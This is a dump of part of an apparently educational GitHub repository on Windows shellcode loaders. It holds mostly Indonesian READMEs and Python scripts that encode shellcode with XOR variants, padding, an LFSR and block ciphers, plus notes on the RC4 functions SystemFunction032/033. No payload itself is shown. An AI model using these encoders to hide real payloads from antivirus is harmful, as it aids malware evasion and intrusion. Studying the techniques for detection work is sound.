https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/feistel/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/padding-dynamic/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transform the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Menyisipkan satu-byte sebagai padding block shellcode. Padding digunakan untuk menandai ukuran block atau banyaknya potongan shellcode di dalam block. 8 | 9 | Shellcode yang tersimpan memiliki format `[M] [M-byte Shellcode] [N] [N-byte Shellcode] ... [Z] [Z-byte Shellcode]`. -------------------------------------------------------------------------------- /windows/writing/custom/padding-dynamic/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | import random 5 | 6 | with open("shellcode.bin", "rb") as f: 7 | shcode = f.read() 8 | shlen = len(shcode) 9 | 10 | # encode the shellcode 11 | idx = 0 12 | enc_shcode = [] 13 | 14 | while idx < shlen: 15 | # generate padding number in the range of (2..4) 16 | pad = random.randrange(2, 5) 17 | remainder = shlen - idx 18 | 19 | if pad > remainder: 20 | pad = remainder 21 | 22 | enc_shcode.append(pad) 23 | enc_shcode += shcode[idx:idx+pad] 24 | idx += pad 25 | 26 | # print as C-array 27 | print("{ ", end='') 28 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 29 | print(" }") 30 | print(f"Length: {len(enc_shcode)}") -------------------------------------------------------------------------------- /windows/writing/custom/padding-dynamic/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/padding-dynamic/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/xor-chain/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transform the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Melakukan `XOR` secara berantai antara byte sekarang dengan byte sebelumnya. 8 | 9 | Teknik ini didasarkan pada mode operasi `CBC (Cipher Block)` pada enkripsi block cipher. Pada `CBC`, setiap block plaintext akan di-XOR dengan block ciphertext sebelumnya sebelum dilakukan enkripsi. Blok awal akan dioperasikan dengan sebuah blok bernama `IV (Initialization Vector)`. Sehingga, dapat kita tulis sebagai berikut: 10 | 11 | ``` 12 | C[i] = Enc(P[i] ^ C[i - 1], K) 13 | C[0] = Enc(P[0] ^ IV, K) 14 | ``` 15 | 16 | Sementara pada teknik ini, operasi berada pada level byte. Setiap byte akan di-XOR dengan byte ciphertext sebelumnya. Adapun kunci awal (genesis) merupakan byte pertama dalam shellcode yang tidak mengalami enkripsi. 17 | 18 | ``` 19 | C[i] = P[i] ^ C[i - 1] 20 | C[0] = P[0] 21 | ``` 22 | 23 | Variasi lain adalah dengan menggunakan bilangan acak sebagai genesis key (atau juga `IV`), sehingga byte awal shellcode akan dienkripsi dengan byte tersebut. 24 | 25 | ``` 26 | C[i] = P[i] ^ C[i - 1] 27 | C[0] = P[0] ^ K 28 | ``` -------------------------------------------------------------------------------- /windows/writing/custom/xor-chain/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | import random 5 | 6 | with open("shellcode.bin", "rb") as f: 7 | shcode = f.read() 8 | shlen = len(shcode) 9 | 10 | key = random.randrange(1, 255) 11 | 12 | # encode shellcode 13 | enc_shcode = [key] 14 | 15 | idx = 0 16 | while idx < shlen: 17 | enc_shcode.append(shcode[idx] ^ enc_shcode[idx]) 18 | idx += 1 19 | 20 | # print as C-array 21 | print("{ ", end='') 22 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 23 | print(" }") -------------------------------------------------------------------------------- /windows/writing/custom/xor-chain/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/xor-chain/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/xor-lfsr/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transform the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Melakukan operasi XOR terhadap shellcode dengan sebuah nilai yang dihasilkan dari `LFSR (Linear Feedback Shift Register)`. Rangkaian byte yang dihasilkan dari `LFSR` merupakan nilai pseudo-random, sehingga setiap byte shellcode akan di-XOR dengan nilai yang berbeda. 8 | 9 | `LFSR` menggunakan sebuah nilai (`seed`), yang dapat berupa sembarang byte. Dalam hal ini, seed dapat berupa sebuah byte yang secara khusus diberikan, atau dapat pula merupakan byte pertama shellcode. 10 | 11 | Pada contoh ini, shellcode akan disimpan dengan format berikut: `[Seed] [Encoded Shellcode]`. -------------------------------------------------------------------------------- /windows/writing/custom/xor-lfsr/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | import random 5 | 6 | with open("shellcode.bin", "rb") as f: 7 | shcode = f.read() 8 | 9 | # generate single byte key 10 | seed = random.randrange(1, 255) 11 | 12 | # xor-encrypt 13 | enc_shcode = [seed] 14 | 15 | state = seed 16 | taps = [8, 6, 5, 4] 17 | for c in shcode: 18 | # generate value from LFSR 19 | feedback = 0 20 | for tap in taps: 21 | feedback ^= (state >> (tap - 1)) & 1 22 | 23 | feedback ^= (state ^ (state >> 3)) & 1 24 | state = ((state << 1) | feedback) & 0xFF 25 | 26 | # XOR with shellcode byte 27 | enc_shcode.append(c ^ state) 28 | 29 | # print as C-array 30 | print("{ ", end='') 31 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 32 | print(" }") 33 | 34 | print(f"Length: {len(enc_shcode)}") -------------------------------------------------------------------------------- /windows/writing/custom/xor-lfsr/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/xor-lfsr/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/xor-multikey/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transform the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Shellcode dienkripsi menggunakan XOR sederhana. Shellcode akan dibagi menjadi beberapa N blok berisi maksimal S-byte. Setiap blok akan didahului dengan sebuah key yang digunakan untuk mengenkripsi blok tersebut. 8 | 9 | Shellcode yang tersimpan memiliki format sebagai berikut: 10 | 11 | ``` 12 | [N] [S] [[Key-1] [Encoded Shellcode-1]] [[Key-2] [Encoded Shellcode-2]] ... [[Key-N] [Encoded Shellcode-N]]. 13 | ``` -------------------------------------------------------------------------------- /windows/writing/custom/xor-multikey/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | import random 5 | 6 | stride = random.randrange(4,8) 7 | 8 | with open("shellcode.bin", "rb") as f: 9 | shcode = f.read() 10 | 11 | nblock = len(shcode) // stride 12 | remainder = len(shcode) % stride 13 | idx_s = 0 14 | 15 | # padding 16 | if remainder != 0: 17 | shcode = shcode + b"\x90"*(stride - remainder) 18 | nblock += 1 19 | 20 | enc_shcode = [nblock, stride] 21 | 22 | for idx_n in range(nblock): 23 | key = random.randrange(1, 255) 24 | 25 | enc_shcode += [key] + [ c ^ key for c in shcode[idx_s : idx_s + stride]] 26 | idx_s += stride 27 | 28 | # print as C-array 29 | print("{ ", end='') 30 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 31 | print(" }") -------------------------------------------------------------------------------- /windows/writing/custom/xor-multikey/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/xor-multikey/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/xor-pair/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transform the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Shellcode dienkripsi menggunakan XOR sederhana. Bagi shellcode menjadi rangkaian pasangan byte. Proses enkripsi dilakukan dengan menggunakan salah satu byte sebagai key dan byte lain sebagai data untuk dilakukan XOR. -------------------------------------------------------------------------------- /windows/writing/custom/xor-pair/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | with open("shellcode.bin", "rb") as f: 5 | shcode = f.read() 6 | shlen = len(shcode) 7 | 8 | if shlen % 2 == 1: 9 | shcode += b"\x90" 10 | shlen += 1 11 | 12 | # encode shellcode 13 | enc_shcode = [] 14 | idx = 0 15 | while idx < shlen: 16 | key = shcode[idx] 17 | 18 | enc_shcode.append(key) 19 | enc_shcode.append(key ^ shcode[idx + 1]) 20 | 21 | idx += 2 22 | 23 | # print as C-array 24 | print("{ ", end='') 25 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 26 | print(" }") -------------------------------------------------------------------------------- /windows/writing/custom/xor-pair/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/xor-pair/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/xor-singlekey-ctr/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transform the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Shellcode dienkripsi menggunakan XOR sederhana. Sebuah key disimpan sebagai byte pertama dan digunakan untuk mengenkripsi shellcode. Setiap selesai mengenkripsi byte, nilai key akan meningkat. 8 | 9 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`. -------------------------------------------------------------------------------- /windows/writing/custom/xor-singlekey-ctr/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | import random 5 | 6 | with open("shellcode.bin", "rb") as f: 7 | shcode = f.read() 8 | 9 | # generate single byte key 10 | key = random.randrange(1, 255) 11 | 12 | # xor-encrypt 13 | enc_shcode = [key] 14 | 15 | for c in shcode: 16 | enc_shcode.append(c ^ key) 17 | key = (key + 1) & 0xFF 18 | 19 | # print as C-array 20 | print("{ ", end='') 21 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 22 | print(" }") 23 | 24 | print(f"Length: {len(enc_shcode)}") -------------------------------------------------------------------------------- /windows/writing/custom/xor-singlekey-ctr/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/xor-singlekey-ctr/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/xor-singlekey/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transform the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Shellcode dienkripsi menggunakan XOR sederhana. Sebuah key disimpan sebagai byte pertama dan digunakan berulang untuk setiap byte shellcode. 8 | 9 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`. -------------------------------------------------------------------------------- /windows/writing/custom/xor-singlekey/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | import random 5 | 6 | with open("shellcode.bin", "rb") as f: 7 | shcode = f.read() 8 | 9 | # generate single byte key 10 | key = random.randrange(1, 255) 11 | 12 | # xor-encrypt 13 | enc_shcode = [key] + [ c ^ key for c in shcode ] 14 | 15 | # print as C-array 16 | print("{ ", end='') 17 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 18 | print(" }") -------------------------------------------------------------------------------- /windows/writing/custom/xor-singlekey/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/xor-singlekey/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Melakukan enkripsi payload menggunakan berbagai algoritma. 6 | 7 | Lihat juga [Crypto Reference](https://github.com/ReversingID/Crypto-Reference) untuk informasi lebih lanjut. -------------------------------------------------------------------------------- /windows/writing/encryption/block/3-way/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption. 4 | 5 | ### Overview 6 | 7 | Enkripsi `3-Way` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | `3-Way` merupakan block cipher yang bekerja berdasarkan kalkulasi 3 integer 32-bit sehingga ukuran block dan panjang key dibatasi pada 96-bit. 10 | 11 | ### References 12 | 13 | - [Reversing.ID 3-Way Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/3-Way/code.c) 14 | - [Wikipedia 3-Way](https://en.wikipedia.org/wiki/3-Way) -------------------------------------------------------------------------------- /windows/writing/encryption/block/3-way/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/3-way/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Enkripsi shellcode dengan block cipher 4 | 5 | ### Overview 6 | 7 | Block cipher adalah jenis algoritma enkripsi terhadap blok berukuran tetap. Shellcode dianggap sebagai data plaintext dan dibagi menjadi beberapa block. 8 | 9 | Algoritma menggunakan kunci simetris dimana kunci yang sama digunakan untuk enkripsi dan dekripsi. 10 | 11 | -------------------------------------------------------------------------------- /windows/writing/encryption/block/aes/CryptDecrypt/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/aes/CryptDecrypt/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/anubis/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption. 4 | 5 | ### Overview 6 | 7 | Enkripsi `Anubis` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | `Anubis` merupakan block cipher sebagai salah satu kontestan pada project NESSIE. Algoritma ini memiliki beberapa opsi ukuran key, namun dalam contoh implementasi akan digunakan ukuran key 128-bit. 10 | 11 | ### References 12 | 13 | - [Reversing.ID Anubis Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Anubis) 14 | - [Reversing.ID Anubis Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/Anubis/Anubis.c) 15 | - [Wikipedia Anubis](https://en.wikipedia.org/wiki/Anubis_(cipher)) -------------------------------------------------------------------------------- /windows/writing/encryption/block/anubis/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/anubis/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/blowfish/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `Blowfish` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | `Blowfish` merupakan block cipher dengan rentang ukuran kunci beragam dari 32-bit hingga 448-bit. Namun dalam contoh implementasi akan digunakan ukuran key 128-bit. 10 | 11 | ### References 12 | 13 | - [Reversing.ID Blowfish Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Blowfish) 14 | - [Wikipedia Blowfish](https://en.wikipedia.org/wiki/Blowfish_(cipher)) -------------------------------------------------------------------------------- /windows/writing/encryption/block/blowfish/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/blowfish/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/camellia/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption. 4 | 5 | ### Overview 6 | 7 | Menggunakan `Tiny Encryptio Algorithm` untuk melakukan enkripsi. 8 | 9 | ### Reference 10 | 11 | - [Wiki Tiny Encyrption Algorithm](https://en.wikipedia.org/wiki/Tiny_Encryption_Algorithm) 12 | - [Git Tiny Encyrption Algorithm implementation](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/TEA/TEA.c) -------------------------------------------------------------------------------- /windows/writing/encryption/block/camellia/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/camellia/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/cipherunicorn-a/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption 4 | 5 | ### Overview 6 | 7 | Enkripsi `CIPHERUNICORN-A` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | `CIPHERUNICORN-A` memiliki beberapa opsi ukuran key, namun dalam contoh implementasi akan digunakan ukuran key 128-bit. 10 | 11 | ### References 12 | 13 | - [Reversing.ID CIPHERUNICORN-A Reference](https://github.com/ReversingID/Crypto-Reference/blob/master/References/Modern/Block-Cipher/CIPHERUNICORN-A) 14 | - [Reversing.ID CIPHERUNICORN-A Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/CIPHERUNICORN-A/Unicorn-A.c) 15 | - [Wikipedia CIPHERUNICORN-A](https://en.wikipedia.org/wiki/CIPHERUNICORN-A) -------------------------------------------------------------------------------- /windows/writing/encryption/block/cipherunicorn-a/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/cipherunicorn-a/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/clefia/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption 4 | 5 | ### Overview 6 | 7 | Enkripsi `CLEFIA` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | `CLEFIA` memiliki beberapa opsi ukuran key, namun dalam contoh implementasi akan digunakan ukuran key 128-bit. 10 | 11 | ### References 12 | 13 | - [Reversing.ID CLEFIA Reference](https://github.com/ReversingID/Crypto-Reference/blob/master/References/Modern/Block-Cipher/CLEFIA) 14 | - [Reversing.ID CLEFIA Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/CLEFIA/CLEFIA.c) -------------------------------------------------------------------------------- /windows/writing/encryption/block/clefia/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/clefia/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/des/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `DES (Data Encryptoin Standard)` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | ### References 10 | 11 | - [Reversing.ID DES Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/DES) 12 | - [Wikipedia DES](https://en.wikipedia.org/wiki/Data_Encryption_Standard) 13 | -------------------------------------------------------------------------------- /windows/writing/encryption/block/des/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/des/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/hierocrypt3/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption 4 | 5 | ### Overview 6 | 7 | Enkripsi `Hierocrypt3` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | `Hierocrypt3` memiliki beberapa opsi ukuran key, namun dalam contoh implementasi akan digunakan ukuran key 128-bit. 10 | 11 | ### References 12 | 13 | - [Reversing.ID Hierocrypt3 Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Hierocrypt-3) 14 | - [Reversing.ID Hierocrypt3 Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/Hierocrypt3/Hierocrypt3.c) -------------------------------------------------------------------------------- /windows/writing/encryption/block/hierocrypt3/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/hierocrypt3/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/khazad/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `KHAZAD` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | ### References 10 | 11 | - [Reversing.ID KHAZAD Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/KHAZAD) 12 | - [Wikipedia KHAZAD](https://en.wikipedia.org/wiki/KHAZAD) -------------------------------------------------------------------------------- /windows/writing/encryption/block/khazad/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/khazad/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/khufu/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `Khufu` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | ### References 10 | 11 | - [Reversing.ID Khufu Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Khufu) 12 | - [Wikipedia Khufu (and Khafre)](https://en.wikipedia.org/wiki/Khufu_and_Khafre) -------------------------------------------------------------------------------- /windows/writing/encryption/block/khufu/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/khufu/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/lea/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `LEA` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | ### References 10 | 11 | - [Reversing.ID LEA Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/LEA) 12 | - [Wikipedia LEA](https://en.wikipedia.org/wiki/LEA_(cipher)) -------------------------------------------------------------------------------- /windows/writing/encryption/block/lea/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/lea/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/lucifer/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `Lucifer` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | ### References 10 | 11 | - [Reversing.ID Lucifer Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Lucifer) 12 | - [Wikipedia Lucifer](https://en.wikipedia.org/wiki/Lucifer_(cipher)) -------------------------------------------------------------------------------- /windows/writing/encryption/block/lucifer/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/lucifer/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/safer/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `SAFER+` (dari keluarga SAFER) dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | `SAFER` merupakan block cipher sebagai salah satu kontestan pada project NESSIE. Algoritma ini memiliki beberapa opsi ukuran key, namun dalam contoh implementasi akan digunakan ukuran key 128-bit. 10 | 11 | ### References 12 | 13 | - [Reversing.ID SAFER Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/SAFER) 14 | - [Reversing.ID SAFER Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/SAFER/SAFER.c) 15 | - [Wikipedia SAFER](https://en.wikipedia.org/wiki/SAFER_(cipher)) -------------------------------------------------------------------------------- /windows/writing/encryption/block/safer/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/safer/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/tea/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption. 4 | 5 | ### Overview 6 | 7 | Menggunakan `Tiny Encryptio Algorithm` untuk melakukan enkripsi. 8 | 9 | ### Reference 10 | 11 | - [Wiki Tiny Encyrption Algorithm](https://en.wikipedia.org/wiki/Tiny_Encryption_Algorithm) 12 | - [Git Tiny Encyrption Algorithm implementation](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/TEA/TEA.c) -------------------------------------------------------------------------------- /windows/writing/encryption/block/tea/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/tea/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/treyfer/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `Treyfer` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | ### References 10 | 11 | - [Reversing.ID Treyfer Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Treyfer) 12 | - [Wikipedia Treyfer](https://en.wikipedia.org/wiki/Treyfer) -------------------------------------------------------------------------------- /windows/writing/encryption/block/treyfer/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/treyfer/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/xtea/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption. 4 | 5 | ### Overview 6 | 7 | Menggunakan `eXtended Tiny Encryptio Algorithm (XTEA)` untuk melakukan enkripsi. 8 | 9 | ### References 10 | 11 | - [Reversing.ID XTEA Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/XTEA) 12 | - [Reversing.ID XTEA Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/XTEA/code.c) -------------------------------------------------------------------------------- /windows/writing/encryption/block/xtea/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/xtea/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/stream/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Enkripsi shellcode dengan stream cipher. 4 | 5 | ### Overview 6 | 7 | Stream cipher adalah jenis algoritma enkripsi kunci simetris dengan menggabungkan plaintext dengan keystream. Dalam stream cipher, setiap byte dalam plaintext dienkripsi satu per satu dengan digit pada ciphertext (stream). 8 | 9 | Algoritma menggunakan kunci simetris dimana kunci yang sama digunakan untuk enkripsi dan dekripsi. -------------------------------------------------------------------------------- /windows/writing/encryption/stream/rc4/SystemFunction/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption 4 | 5 | ### Overview 6 | 7 | Enkripsi RC4 menggunakan fungsi `SystemFunction032` atau `SystemFunction033` yang merupakan API internal (tak terdokumentasi). 8 | 9 | Fungsi `SystemFunction032` digunakan untuk melakukan enkripsi dan `SystemFunction033` digunakan untuk dekripsi. Namun secara internal, keduanya menunjuk pada offset sama sehingga kedua fungsi dapat digunakan untuk melakukan enkripsi dan dekripsi menggunakan key yang sama. 10 | 11 | ```c++ 12 | NTSTATUS SystemFunction032 (struct ustring* data, struct ustring* key); 13 | 14 | NTSTATUS SystemFunction033 (struct ustring* data, struct ustring* key); 15 | 16 | typedef struct 17 | { 18 | DWORD Length; 19 | DWORD MaximumLength; 20 | 